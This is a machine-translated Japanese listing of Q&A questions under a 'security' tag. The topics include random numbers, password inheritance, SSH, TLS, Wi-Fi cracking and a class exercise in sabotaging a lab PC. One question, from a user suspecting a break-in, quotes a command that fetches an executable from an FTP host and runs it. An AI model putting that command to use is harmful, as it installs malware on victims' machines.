タグ付けされた質問 「security」

コンピューターシステムと情報の盗難やデータ破壊などの脅威からの保護。

18
擬似乱数と真の乱数はどのように異なるのですか?なぜ重要なのですか?
私はこれをまったく持っていません。サイコロを転がす小さな言語のプログラムを書くと言うだけです(例としてサイコロを使用します)。600,000のロールの後、各数字は約100,000回ロールされていたはずです。 「真のランダム性」専用のWebサイトがあるのはなぜですか?確かに、上記の観察を考えると、任意の数を取得する可能性は、どれだけ多くの数を選択できるかよりもほぼ正確に1です。 Pythonで試してみました:これが6,000万回のロールの結果です。最も高い変動は0.15のようなものです。それは手に入れるほどランダムではありませんか? 1 - 9997653 2347.0 2 - 9997789 2211.0 3 - 9996853 3147.0 4 - 10006533 -6533.0 5 - 10002774 -2774.0 6 - 9998398 1602.0

12
妻にログイン、パスワードなどへの緊急アクセスを許可するにはどうすればよいですか?
私は私の世帯のデジタルの第一人者です。私の妻は電子メールやフォーラムのウェブサイトには精通していますが、重要なデジタル関連のすべてのもの-オンラインバンキングやパスワードを必要とするその他のもの-で私を信頼しています。また、家族の写真や、現代の家にある他のデジタルものもたくさんあります。関連するアクションについて説明しますが、それらを実行するのは常に私です。 私が突然無力になった場合、妻は完全に立ち往生します:彼女は私たちのコンピューターのどこにデジタルのものがあり、それにアクセスする方法、私たちが持っているオンラインアカウント、そして彼らのログイン資格情報が何であるかを知りません。また、多くの一般公開(個人のWebサイト、メールアカウント、ソーシャルネットワークなど)が未解決のままになります。 物事を複雑にするために、私はどこでも同じパスワードを使用しない人の一人です。SuperGenPassとLastPassを組み合わせて使用​​し、可能な限り2要素認証も使用します。私は彼女がストレスの多い状況ですべてを書面で説明することで彼女の道を見つけることをあまり望んでいません。 ハイテクに精通した双子の兄弟に聞いて、LastPassのマスターパスフレーズを彼に託すべきだと彼女に言うことができました。私はそれが成功する可能性が十分にあると感じていますが、それはエレガントではなく、妻が情報を制御できないままにします。 妻が私のデジタル遺跡にアクセスできるようにするにはどうすればよいですか? アップデート: 途方もないはあなたに感謝し、すべての偉大な貢献のために。私は多くを学びました!今、私はただ決める必要があります:-)

27
Windows 7を実行しているPCを台無しにする方法 [閉まっている]
それでは、私のPCクラスでは、ラボのPCを台無しにする3つのハックを見つけなければなりません。私とパートナーはPCを台無しにし、別のチームがそれを修正しようとします。そのシステムはWindows 7です。通常の使用を停止したり、PCが役に立たなくなったりするものはすべて動作します。状況、契約条項: ケースを開けられない レジストリ設定を使用できません(サイズが大きいため、他のチームが修正するのに長い時間がかかります) 15〜30分以内に修正可能にする必要があります(つまり、再インストールが必要になるほどひどく混乱しないことを意味します)。 管理ツールを使用できます ダウンロードなし(PCはネットワークに接続されていません) 注:既に説明したように、デスクトップのスクリーンショットを撮り、それを背景として設定することにより、偽のクリック不可能なデスクトップを作成するようなものは機能しません。また、再起動リンクを作成し、それを自動起動プログラムに入れることについても説明しました。しかし、このタイプの何かは聞くのが素晴らしいでしょう。 助言がありますか? PSこれは本当に私の大学のクラスのためですので、ここでは害はありません、ただ純粋な研究室の楽しみ:) 編集後に追加:まず、入力に感謝します。ここでいくつかの素晴らしいアイデアをお伝えします。いくつかのことを明確にするために:-私は管理者アカウントを持っています-約15分で完了する必要があり、15〜30分で修正できる必要があります-ラボPCであるため、どのネットワークにも接続できません大学はそれらを許可しません。 @Billare、はい、私たちの先生は心からハッカーです:) ああ、ところで、別のメディアから起動したり、BIOSを台無しにしたりすることは許されていないと思います。これはデスクトップシステム管理クラスであり、すべてをWindows内で行う必要があります。許可されているかどうかを確認し、許可されている場合は、ここからいくつかのアイデアを使用できます。みなさんに再び感謝します。 編集2:別の角度を試してみましょう。不快感を引き起こすいくつかの重要でないサービスを無効にしてはどうでしょうか。主なポイントは、長期使用ではなく、PCの使用を開始してからの痛みである必要があります。うわー、私の頭はここからいくつかのアイデアを紡いでいる、素晴らしい、今夜あなたが私が使用したものをお知らせします。 モデレーターの注意:コンピューターを無効化/破壊する方法を提案する場合、すぐに明らかでない場合は、破壊しているものを修正する方法に関する情報も含めてください。 ワンライナーの回答は、それらがどのように機能するのか、何をするのかを説明できない場合、コメントに変換されます。

20
特定のWebサイトが提供するSSL / TLS暗号スイートを一覧表示するにはどうすればよいですか?
特定のWebサイトが提供するSSL / TLS暗号スイートのリストを取得するにはどうすればよいですか? 私はopensslを試しましたが、出力を調べると: $ echo -n | openssl s_client -connect www.google.com:443 CONNECTED(00000003) depth=1 /C=ZA/O=Thawte Consulting (Pty) Ltd./CN=Thawte SGC CA verify error:num=20:unable to get local issuer certificate verify return:0 --- Certificate chain 0 s:/C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com i:/C=ZA/O=Thawte Consulting (Pty) Ltd./CN=Thawte SGC CA 1 s:/C=ZA/O=Thawte Consulting (Pty) Ltd./CN=Thawte SGC CA i:/C=US/O=VeriSign, …
261 security  ssl  tls 

15
SSHトンネルを確実に開いたままにする方法
仕事からのSSHトンネルを使用して、さまざまなアイドティックファイアウォールを迂回します(上司には問題ありません:))。問題は、しばらくすると通常ssh接続がハングし、トンネルが壊れることです。 少なくともトンネルを自動的に監視できれば、トンネルがハングしたときに再開できますが、それを行う方法すら考えていません。 もちろん、私のssh接続がハングするのを防ぐ方法を教えてくれる人にはボーナスポイントです!

12
ECDSAホスト鍵に関する警告を修正する方法
UbuntuサーバーでパスワードなしのSSHを設定しようとしています ssh-copy-id myuser@myserverしかし、私はエラーを得ています: 警告: 'myserver'のECDSAホストキーはIPアドレス '192.168.1.123'のキーと異なります 何が原因で、それをどのように修正しますか?削除してみた .ssh リモートマシン上のディレクトリ、および実行中 ssh-keygen -R "myserver" しかし、これはエラーを解決しません。

15
「このファイルは別のコンピューターから来ました...」-フォルダー内のすべてのファイルを個別にブロック解除せずにブロック解除するにはどうすればよいですか?
Windows XP SP2およびWindows Vistaでは、NTFSパーティションにダウンロードされたファイルにゾーン情報が保存されるため、ファイルを「ブロック解除」するまで特定のアプリケーションの特定のファイルをブロックします。 たとえば、ソースコードのzipファイルをダウンロードして試してみると、すべてのファイルにファイルプロパティのセキュリティ設定が表示されます 「このファイルは別のコンピューターからのものであり、このコンピューターを保護するためにブロックされている可能性があります」 「ブロック解除」ボタンとともに。気にしないプログラムもありますが、Visual Studioはブロックが解除されるまでプロジェクトをソリューションにロードすることを拒否します。 すべてのプロジェクトファイルに移動して個別にブロックを解除するのはそれほど難しくありませんが、苦痛です。また、選択した複数のファイルのブロックを同時に解除できるようには見えません。 ディレクトリにあるすべてのファイルを個別に移動することなくブロック解除する方法はありますか? すべての新しいファイルに対してこれをグローバルにオフにできることは知っていますが、それをしたくないとしましょう
186 windows  security  ntfs 

9
ほとんどの愛好家が人々のWi-Fiネットワークをクラックすることは本当に可能ですか?
最も熱心なユーザーは(専門家でなくても)よく知られた手法を使用して、平均的なホームルーターのセキュリティを突破できますか? 基本的なセキュリティオプションは次のとおりです。 さまざまな暗号化方式を使用した強力なネットワークパスワード カスタムルーターアクセスパスワード WPS SSIDブロードキャストなし MACアドレスフィルタリング これらのいくつかは危険にさらされており、ホームネットワークをより安全にするために何をすべきですか?

5
Linuxは、新しいパスワードが以前のパスワードと似ていることをどのように知っていますか?
数回、さまざまなLinuxマシンでユーザーのパスワードを変更しようとしましたが、新しいパスワードが古いパスワードと似ている場合、OSはそれらがあまりにも似ていると不満を言いました。 システムはこれをどのように知っているのでしょうか?パスワードはハッシュとして保存されると思いました。これは、システムが新しいパスワードの類似性を比較できる場合、古いパスワードが実際にプレーンテキストとして保存されることを意味しますか?
145 linux  unix  security 

16
Linuxの空きディスク領域を消去する方法は?
ファイルが削除されても、他のもので明示的に上書きされない限り、その内容はファイルシステムに残ったままになる場合があります。このwipeコマンドはファイルを安全に消去できますが、どのファイルでも使用されていない空きディスク容量を消去することは許可されていないようです。 これを達成するには何を使用すればよいですか?

3
ブラウザがhttps://1.1.1.1が安全であると考えるのはなぜですか?
私が訪れたときhttps://1.1.1.1を、私が使用して、任意のWebブラウザでは、URLが安全であると考えています。 これは、Google Chromeが示すものです。 通常、IPアドレスを使用してHTTPSサイトにアクセスしようとすると、次のようなセキュリティ警告が表示されます。 私の理解では、サイト証明書はドメインと一致する必要がありますが、Google Chrome証明書ビューアには表示されません1.1.1.1: GoDaddyのナレッジベース記事「イントラネット名またはIPアドレスの証明書を要求できますか?」言う: いいえ-イントラネット名またはIPアドレスの証明書要求を受け付けなくなりました。これは業界全体の標準であり、GoDaddyに固有のものではありません。 (強調鉱山) そしてまた: その結果、2016年10月1日から、証明機関(CA)は、イントラネット名またはIPアドレスを使用するSSL証明書を失効させる必要があります。 (強調鉱山) そして: IPアドレスとイントラネット名を保護する代わりに、www.coolexample.comなどの完全修飾ドメイン名(FQDN)を使用するようにサーバーを再構成する必要があります。 (強調鉱山) 強制失効日が2016年10月1日を過ぎた後でも、1.1.1.12018年3月29日に証明書が発行されました(上のスクリーンショットを参照)。 すべての主要なブラウザがhttps://1.1.1.1が信頼できるHTTPS Webサイトであると考える可能性はありますか?

9
信頼できないUSBドライブを挿入して閲覧する危険性は何ですか?
誰かがいくつかのファイルをUSBスティックにコピーしてほしいと思ったとします。AutoRunを無効にして(グループポリシー経由で)完全にパッチを適用したWindows 7 x64を実行しています。USBドライブを挿入し、Windowsエクスプローラーで開いて、いくつかのファイルをコピーします。既存のファイルを実行または表示しません。これを行うと、どのような悪いことが起こる可能性がありますか? Linux(Ubuntuなど)でこれを行うとどうなりますか? 私が探していることに注意してください詳細の特定のリスク(もしあれば)、ではない「あなたはこれを行わない場合、それはより安全になります」。

6
コマンドラインでgzipファイルをパスワードで保護するにはどうすればよいですか?
Ubuntu 10.04でtarコマンドを使用して、いくつかのtar.gz(および場合によってはtar.bz2)ファイルを作成します。 ファイルをパスワードで保護します。 これを行うコマンドは何ですか(Googleで検索しましたが、パスワードを使用して圧縮ファイルを作成および抽出する方法を示すものは見つかりませんでした)。 誰もこれを行う方法を知っていますか?
130 ubuntu  security  tar  gzip  bzip2 

5
Linuxコンピューターがハッキングされたかどうかを識別する方法
自宅のPCは通常はオンになっていますが、モニターはオフになっています。今晩、仕事から帰ってきて、ハッキングの試みのように見えるものを見つけました:私のブラウザでは、Gmailは開いていました(それは私でした)が、TOフィールドで次のような作成モードでした: md / c echo open cCTeamFtp.yi.org 21 >> ik&echo user ccteam10 765824 >> ik&echo binary >> ik&echo get svcnost.exe >> ik&echo bye >> ik&ftp -n -v -s:ik&del ik &svcnost.exe&exit echoあなたが所有しました これはWindowsのコマンドラインコードのように見えmd、Gmailが作成モードであるという事実と組み合わされたコードの開始は、誰かがcmdコマンドを実行しようとしたことを明らかにしています。私はこのPCで実際にWindowsを実行していないのは幸運だったと思いますが、他にも実行できるものがあります。このようなことが私に起こったのはこれが初めてです。私はLinuxの第一人者ではありません。また、当時Firefox以外のプログラムを実行していませんでした。 私はこれを書いていないことを絶対に確信しており、他の誰も私のコンピュータに物理的にいませんでした。また、最近、Googleのパスワード(および他のすべてのパスワード)を次のようなものに変更したvMA8ogd7bvため、誰かがGoogleアカウントをハッキングしたとは思わない。 今何があったの?何年もマルウェアを実行しているおばあちゃんの古いWindowsマシンではなく、最近の新しいUbuntuのインストールでは、誰かが私のコンピューターにキーストロークを入力する方法を教えてください。 更新: いくつかのポイントと質問に対処しましょう。 私はオーストリアの田舎にいます。私のWLANルーターは、WPA2 / PSKと辞書にない中程度の強力なパスワードを実行します。総当たりで、ここから50メートル以内でなければなりません。ハッキングされた可能性は低いです。 私はUSB有線キーボードを使用しているので、誰もがハッキングする範囲内にいる可能性は非常に低いです。 当時はコンピューターを使用していませんでした。仕事中に家で遊んでいただけです。これは、モニターに取り付けられたネットトップPCなので、めったに電源をオフにしません。 マシンはわずか2か月で、Ubuntuのみを実行します。私は奇妙なソフトウェアを使用したり、奇妙なサイトにアクセスしたりしていません。主にStack Exchange、Gmail、および新聞です。ノーゲーム。Ubuntuは最新の状態を保つように設定されています。 実行中のVNCサービスを認識していません。確かにインストールも有効化もしていません。他のサーバーも起動していません。デフォルトでUbuntuで実行されているものがあるかどうかわかりませんか? GmailのアカウントアクティビティのすべてのIPアドレスを知っています。Googleは入り口ではなかったと確信しています。 Log File Viewerを見つけましたが、何を探すべきかわかりません。助けて? 私が本当に知りたいのは、そして本当に私を危険にさらしているのは、インターネット上の誰もが私のマシンでキーストロークをどのように生成できるのかということです。それについてすべてのtinfoil-hatでなくてもどうすればそれを防ぐことができますか?私はLinuxオタクではありません。私は20年以上もWindowsを台無しにしていて、飽き飽きしている父親です。そして、18年以上にわたってオンラインになっている間、私は個人的にハックの試みを見たことがないので、これは私にとって新しいことです。
128 linux  security 


弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.